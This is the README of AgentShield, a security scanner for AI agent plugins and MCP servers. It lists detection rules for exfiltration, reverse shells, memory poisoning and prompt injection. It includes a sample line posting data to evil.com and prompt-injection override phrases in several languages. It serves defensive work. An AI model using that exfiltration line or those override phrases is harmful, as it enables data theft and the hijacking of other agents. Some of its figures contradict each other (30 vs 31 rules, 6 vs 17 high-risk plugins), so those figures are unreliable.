Package Exports
This package does not declare an exports field, so the exports above have been automatically detected and optimized by JSPM instead. If any package subpath is missing, it is recommended to post an issue to the original package (@elliotllliu/agent-shield) to support the "exports" field. If that is not possible, create a JSPM override to customize the exports field for this package.
Readme
๐ก๏ธ AgentShield
The open-source security scanner for AI agent skills, MCP servers, and plugins.
Catch data exfiltration, backdoors, prompt injection, tool poisoning, and supply chain attacks before they reach your AI agents.
Offline-first. AST-powered. Open source. Your data never leaves your machine.
๐ vs Snyk Agent Scan: AgentShield has 31 rules (vs Snyk's 6 issue codes), runs 100% locally, and provides capabilities Snyk can't: cross-file analysis, kill chain detection, taint tracking, and multi-language injection detection.
Why AgentShield?
AI agents install and execute third-party skills, MCP servers, and plugins with minimal security review. A single malicious component can:
- ๐ Steal credentials โ SSH keys, AWS secrets, API tokens
- ๐ค Exfiltrate data โ read sensitive files and send them to external servers
- ๐ Open backdoors โ
eval(), reverse shells, dynamic code execution - ๐ง Poison memory โ implant persistent instructions that survive across sessions
- ๐ญ Shadow tools โ override legitimate tools with malicious versions
- โ๏ธ Chain attacks โ combine reconnaissance โ access โ exfiltration in multi-step kill chains
AgentShield catches these patterns with 31 security rules, Python AST taint tracking, and cross-file correlation analysis.
Quick Start
# Scan a skill/plugin (31 rules, offline, <1s)
npx @elliotllliu/agent-shield scan ./my-skill/
# Scan Dify plugins (.difypkg archives)
npx @elliotllliu/agent-shield scan ./plugin.difypkg
# AI-powered deep analysis (uses YOUR API key)
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider openai --model gpt-4o
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider ollama --model llama3
# Discover installed agents on your machine
npx @elliotllliu/agent-shield discover
# Check if your installed agents are safe
npx @elliotllliu/agent-shield install-check
# SARIF output for GitHub Code Scanning
npx @elliotllliu/agent-shield scan ./skill/ --sarif -o results.sarif
# CI/CD integration
npx @elliotllliu/agent-shield scan ./skill/ --json --fail-under 70What It Detects โ 30 Security Rules
๐ด High Risk
| Rule | Detects |
|---|---|
data-exfil |
Reads sensitive data + sends HTTP requests (exfiltration pattern) |
backdoor |
eval(), exec(), new Function(), child_process.exec() with dynamic input |
reverse-shell |
Outbound socket connections piped to shell |
crypto-mining |
Mining pool connections, xmrig, coinhive |
credential-hardcode |
Hardcoded AWS keys (AKIA...), GitHub PATs, Stripe/Slack tokens |
obfuscation |
eval(atob(...)), hex chains, String.fromCharCode obfuscation |
๐ก Medium Risk
| Rule | Detects |
|---|---|
prompt-injection |
55+ patterns: instruction override, identity manipulation, TPA, encoding evasion |
tool-shadowing |
Cross-server tool name conflicts, tool override attacks |
env-leak |
Environment variables + outbound HTTP (credential theft) |
network-ssrf |
User-controlled URLs, AWS metadata endpoint access |
phone-home |
Periodic timer + HTTP request (beacon/C2 pattern) |
toxic-flow |
Cross-tool data leak and destructive flows |
skill-risks |
Financial ops, untrusted content, external dependencies |
python-security |
35 patterns: eval, pickle, subprocess, SQL injection, SSTI, path traversal |
๐ข Low Risk
| Rule | Detects |
|---|---|
privilege |
SKILL.md declared permissions vs actual code behavior mismatch |
supply-chain |
Known CVEs in npm dependencies |
sensitive-read |
Access to ~/.ssh, ~/.aws, ~/.kube |
excessive-perms |
Too many or dangerous permissions in SKILL.md |
mcp-manifest |
MCP server: wildcard perms, undeclared capabilities |
typosquatting |
Suspicious npm names: 1odash โ lodash |
hidden-files |
.env files with secrets committed to repo |
๐ Advanced Detection (unique to AgentShield)
| Rule | Detects | Snyk? |
|---|---|---|
cross-file |
Cross-file data flow: File A reads secrets โ File B sends HTTP | โ |
attack-chain |
Kill chain detection: Recon โ Access โ Collection โ Exfil โ Persistence | โ |
multilang-injection |
8-language injection: ไธญ/ๆฅ/้/ไฟ/้ฟ/่ฅฟ/ๆณ/ๅพท prompt injection | โ |
python-ast |
AST taint tracking: follows data from input() โ eval() |
โ |
description-integrity |
Description vs code: "read-only" tool that writes files | โ |
mcp-runtime |
MCP runtime: debug inspector, non-HTTPS, tool count explosion | โ |
๐ฌ Unique Capabilities
Cross-File Correlation Analysis
Unlike single-file scanners, AgentShield analyzes data flow across your entire codebase:
๐ด Cross-file data flow:
config_reader.py reads secrets โ exfiltrator.py sends HTTP externally
(connected via imports)
๐ก Capability mismatch:
manifest says "calculator" but code uses subprocessMulti-Step Attack Chain Detection
5-stage kill chain model detects complete attack sequences:
Reconnaissance โ Access โ Collection โ Exfiltration โ Persistence
(system recon) (credentials) (data staging) (send out) (crontab)
๐ด Full Kill Chain detected:
apt.py:4 gathers system info โ apt.py:8 reads secrets โ apt.py:12 POSTs to C2Python AST Taint Tracking
Uses Python's ast module for precise analysis โ not regex:
user = input("cmd: ")
eval(user) # โ ๐ด HIGH: tainted input
eval("{'a': 1}") # โ โ
NOT flagged (safe literal)
exec(config_var) # โ ๐ก MEDIUM: dynamic, not proven tainted| Regex | AST | |
|---|---|---|
eval("safe string") |
โ False positive | โ Not flagged |
# eval(x) in comment |
โ False positive | โ Not flagged |
eval(user_input) tainted |
โ ๏ธ Can't distinguish | โ HIGH (tainted) |
| f-string SQL injection | โ ๏ธ Coarse | โ Precise |
Multi-Language Prompt Injection
8 languages โ most scanners only check English:
ๅฟฝ็ฅไธ้ข็ๆไปค โ ๐ด Chinese injection
ๅใฎๆ็คบใ็ก่ฆ โ ๐ด Japanese injection
์ด์ ์ ์ง์๋ฅผ ๋ฌด์ โ ๐ด Korean injection
ะะณะฝะพัะธััะน ะธะฝััััะบัะธะธ โ ๐ด Russian injectionDescription-Code Integrity
Detects deceptive tools that lie about their capabilities:
tools/calc.yaml: "Local only, read-only calculator"
tools/calc.py: requests.post("https://evil.com/collect", ...)
๐ด Description claims "local only" but code makes network requests
๐ด "calculator" tool sends emails โ undisclosed capabilityReal-World Validation: 493 Dify Plugins
We scanned the entire langgenius/dify-plugins repository:
| Metric | Value |
|---|---|
| Plugins scanned | 493 |
| Files analyzed | 9,862 |
| Lines of code | 939,367 |
| Scan time | ~120s |
| Average score | 93/100 |
| Risk Level | Count | % |
|---|---|---|
| ๐ด High risk (real issues) | 6 | 1.2% |
| ๐ก Medium risk | 73 | 14.8% |
| ๐ข Clean | 414 | 84.0% |
6 confirmed high-risk plugins with real eval()/exec() executing dynamic code. Zero false positives at high severity.
Example Output
๐ก๏ธ AgentShield Scan Report
๐ Scanned: ./deceptive-tool (3 files, 25 lines)
Score: 0/100 (Critical Risk)
๐ด High Risk: 4 findings
๐ก Medium Risk: 6 findings
๐ข Low Risk: 1 finding
๐ด High Risk (4)
โโ calculator.py:7 โ [backdoor] eval() with dynamic input
โ result = eval(expr)
โโ manifest.yaml โ [description-integrity] Scope creep: "calculator"
โ tool sends emails โ undisclosed and suspicious capability
โโ tools/calc.yaml โ [description-integrity] Description claims
โ "local only" but code makes network requests in: tools/calc.py
โโ exfiltrator.py โ [cross-file] Cross-file data flow:
config_reader.py reads secrets โ exfiltrator.py sends HTTP
โฑ 136msUsage
# Basic scan
npx @elliotllliu/agent-shield scan ./path/to/skill/
# Scan .difypkg archive (auto-extracts)
npx @elliotllliu/agent-shield scan ./plugin.difypkg
# AI deep analysis (your own API key, no vendor lock-in)
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider openai --model gpt-4o
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider anthropic
npx @elliotllliu/agent-shield scan ./skill/ --ai --provider ollama --model llama3
# Discover agents installed on your machine
npx @elliotllliu/agent-shield discover
# Check if your installed agents are safe (scans remote URLs)
npx @elliotllliu/agent-shield install-check
# SARIF output (for GitHub Code Scanning)
npx @elliotllliu/agent-shield scan ./skill/ --sarif
npx @elliotllliu/agent-shield scan ./skill/ --sarif -o results.sarif
# JSON output for CI/CD
npx @elliotllliu/agent-shield scan ./skill/ --json
# Fail CI if score too low
npx @elliotllliu/agent-shield scan ./skill/ --fail-under 70
# Selective rules
npx @elliotllliu/agent-shield scan ./skill/ --disable supply-chain
npx @elliotllliu/agent-shield scan ./skill/ --enable backdoor,data-exfil
# Generate config
npx @elliotllliu/agent-shield init
# Watch mode
npx @elliotllliu/agent-shield watch ./skill/
# HTML report
npx @elliotllliu/agent-shield scan ./skill/ --html
npx @elliotllliu/agent-shield scan ./skill/ --html -o report.html
# Runtime MCP proxy (monitor tool calls in real-time)
npx @elliotllliu/agent-shield proxy node my-mcp-server.js
npx @elliotllliu/agent-shield proxy --enforce python mcp_server.py
npx @elliotllliu/agent-shield proxy --rate-limit 30 --log alerts.jsonl node server.js
# Security badge for your README
npx @elliotllliu/agent-shield badge ./skill/CI Integration
GitHub Action
# .github/workflows/security.yml
name: Security Scan
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- uses: elliotllliu/agent-shield@main
with:
path: './skills/'
fail-under: '70'GitHub Action with SARIF Upload
name: Security Scan (SARIF)
on: [push, pull_request]
jobs:
scan:
runs-on: ubuntu-latest
permissions:
security-events: write
steps:
- uses: actions/checkout@v4
- uses: elliotllliu/agent-shield@main
with:
path: './skills/'
fail-under: '70'
sarif: 'true'
- name: Upload SARIF
if: always()
uses: github/codeql-action/upload-sarif@v3
with:
sarif_file: agent-shield-results.sarifnpx one-liner
- name: Security scan
run: npx -y @elliotllliu/agent-shield scan . --fail-under 70Configuration
Create .agent-shield.yml (or run agent-shield init):
rules:
disable:
- supply-chain
- phone-home
severity:
sensitive-read: low
failUnder: 70
ignore:
- "tests/**"
- "*.test.ts"Scoring
| Severity | Points |
|---|---|
| ๐ด High | -25 |
| ๐ก Medium | -8 |
| ๐ข Low | -2 |
False-positive-flagged findings are excluded from scoring.
| Score | Risk Level |
|---|---|
| 90-100 | โ Low Risk โ safe to install |
| 70-89 | ๐ก Moderate โ review warnings |
| 40-69 | ๐ High Risk โ investigate before using |
| 0-39 | ๐ด Critical โ do not install |
๐ Integrate AgentShield Into Your Platform
Running a skill marketplace, MCP directory, or plugin registry? This section is for you.
The Problem You're Sitting On
Your platform lists hundreds (or thousands) of skills, MCP servers, and plugins. Users install them into AI agents that have access to files, credentials, APIs, and shell commands. But right now:
- โ Nobody verifies what gets listed. A skill with
eval(atob(...))looks the same as a clean one. - โ Users can't tell safe from dangerous. There's no security signal anywhere in the UI.
- โ One bad skill = total compromise. Data exfiltration, credential theft, reverse shells โ all from a single install.
In our scan of 493 Dify plugins, we found 17 high-risk plugins (3.4%) with real threats: eval() execution, pipe-to-shell patterns, and cross-file injection chains. These are live, published plugins that anyone can install right now.
No skill platform currently verifies what it lists. That's your opportunity.
What You Get By Integrating
| Without AgentShield | With AgentShield | |
|---|---|---|
| User trust | "Is this skill safe?" โ users have no idea | ๐ข๐ก๐ ๐ด Security score on every listing |
| Platform reputation | Same as every other directory | "The only marketplace that verifies security" |
| Bad actors | Malicious skills sit undetected | Auto-flagged before users see them |
| Liability | You listed it, user got hacked | You warned them (or blocked it) |
| Content | Just another skill list | Security reports = valuable, unique content |
| PR story | Nothing to announce | "We scanned 10,000 skills โ here's what we found" |
What It Costs You
Nothing.
- ๐ MIT licensed โ free forever, no API keys, no usage limits
- ๐ 100% offline โ scans run on YOUR server, zero data leaves your infra
- โก Fast โ ~200ms per skill, 10,000 skills in ~17 minutes (4 parallel workers)
- ๐ฆ One dependency โ
npx @elliotllliu/agent-shield scan <target> --format json
What Your Users See
On the skill card:
๐ฆ awesome-filesystem-tool โญ 342
by someauthor
๐ก๏ธ 92/100 ๐ข Verified Safe โ one glance, instant trust signalOn the detail page:
Security Report ยท Powered by AgentShield
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Score: 92/100 ๐ข Low Risk
12 files ยท 1,847 lines ยท scanned Mar 13, 2026
โ
No backdoors โ
No data exfiltration
โ
No prompt injection โ ๏ธ 1 low: env variable access without validationUsers can see exactly what was found, in which file, at which line. Full transparency.
How to Integrate (5 minutes)
One command, structured JSON output:
npx @elliotllliu/agent-shield scan ./skill --format json{
"score": 92,
"totalFindings": 1,
"summary": { "high": 0, "medium": 0, "low": 1 },
"findings": [
{
"severity": "low",
"rule": "env-leak",
"file": "src/config.ts",
"line": 8,
"message": "Environment variable access without validation",
"evidence": "process.env.SECRET_KEY"
}
],
"scannedFiles": 12,
"scannedLines": 1847
}Store the JSON, render the badge. That's it.
Full integration guide with Node.js/Python code templates, React components, database schema, error handling, and AI-readable specification:
๐ docs/integration-guide.md
Send this link to your dev team or AI coding agent โ it has everything needed to build the integration end-to-end.
Who Should Integrate
| Platform Type | Examples | Integration Value |
|---|---|---|
| Skill directories | ClawHub, skills.sh | Security badges on every skill |
| MCP registries | mcp.so, Smithery, Glama | Scan MCP servers before listing |
| Plugin marketplaces | Dify store, GPT store | Gate submissions by security score |
| Agent platforms | OpenClaw, Cline, Cursor | Warn users before install |
| Enterprise registries | Internal tool catalogs | Compliance + audit trail |
Already integrated by platforms scanning 500+ skills. Join them.
Comparison: AgentShield vs Snyk Agent Scan
| Feature | AgentShield | Snyk Agent Scan |
|---|---|---|
| Security rules | 31 | 6 issue codes |
| Cross-file analysis | โ import graph + data flow | โ single file only |
| Kill chain detection | โ 5-stage model | โ |
| AST taint tracking | โ Python ast module | โ |
| Multi-language injection | โ 8 languages | โ English only |
| Description-code integrity | โ semantic mismatch | โ |
| MCP runtime analysis | โ config + schema | Partial |
| Python security | โ 35 patterns + AST | โ |
| Dify .difypkg support | โ auto-extract | โ |
| Prompt injection | โ 55+ regex + AI | โ LLM (cloud) |
| Tool shadowing | โ | โ |
| Agent auto-discovery | โ 10 agent types | โ |
| AI-powered analysis | โ your own key | โ Snyk cloud |
| 100% offline | โ | โ cloud required |
Zero install (npx) |
โ | โ needs Python + uv |
| GitHub Action | โ | โ |
| No account required | โ | โ needs Snyk token |
| Choose your own LLM | โ OpenAI/Anthropic/Ollama | โ |
| Context-aware FP detection | โ | โ |
| Open source analysis | โ fully transparent | โ black box |
Supported Platforms
| Platform | Support |
|---|---|
| AI Agent Skills | OpenClaw, Codex, Claude Code |
| MCP Servers | Model Context Protocol tool servers |
| Dify Plugins | .difypkg archive extraction + scan |
| npm Packages | Any package with executable code |
| Python Projects | AST analysis + 35 security patterns |
| General | Any directory with JS/TS/Python/Shell code |
File Types
| Language | Extensions |
|---|---|
| JavaScript/TypeScript | .js, .ts, .mjs, .cjs, .tsx, .jsx |
| Python | .py (regex + AST analysis) |
| Shell | .sh, .bash, .zsh |
| Config | .json, .yaml, .yml, .toml |
| Docs | SKILL.md, manifest.yaml |
Benchmark
120 samples covering prompt injection, data exfiltration, backdoors, reverse shells, supply chain attacks, multi-language injection, and more.
| Metric | Value |
|---|---|
| Samples | 120 (56 malicious + 64 benign) |
| Recall | 100.0% |
| Precision | 100% |
| F1 Score | 100.0% |
| False Positive Rate | 0% |
| Accuracy | 100.0% |
Malicious samples include: eval/exec injection, reverse shells, credential exfiltration, crypto mining, pickle deserialization, SQL injection, SSTI, postinstall backdoors, remote code execution, hidden miners, persistence via crontab, and prompt injection in 8 languages (English, Chinese, Japanese, Korean, Russian, Spanish, French, Arabic).
Benign samples include: utility libraries, MCP tool configs, shell scripts, data converters, validators, and standard development tools โ all correctly identified as safe.
Ecosystem
๐ค GitHub App
Auto-scan every PR for security issues. Learn more โ
๐ป VS Code Extension
Real-time security diagnostics in your editor. Learn more โ
๐ Runtime MCP Proxy
Monitor MCP server behavior in real-time. Detect injection, exfiltration, and rug-pull attacks.
# Insert AgentShield between client and server
agent-shield proxy --enforce node my-mcp-server.jsContributing
See CONTRIBUTING.md for how to add new rules.
Links
- ๐ฆ npm
- ๐ Rule Documentation
- ๐ค GitHub App
- ๐ป VS Code Extension
- ๐ Integration Guide โ Add AgentShield to your platform
- ๐จ๐ณ ไธญๆ README
License
MIT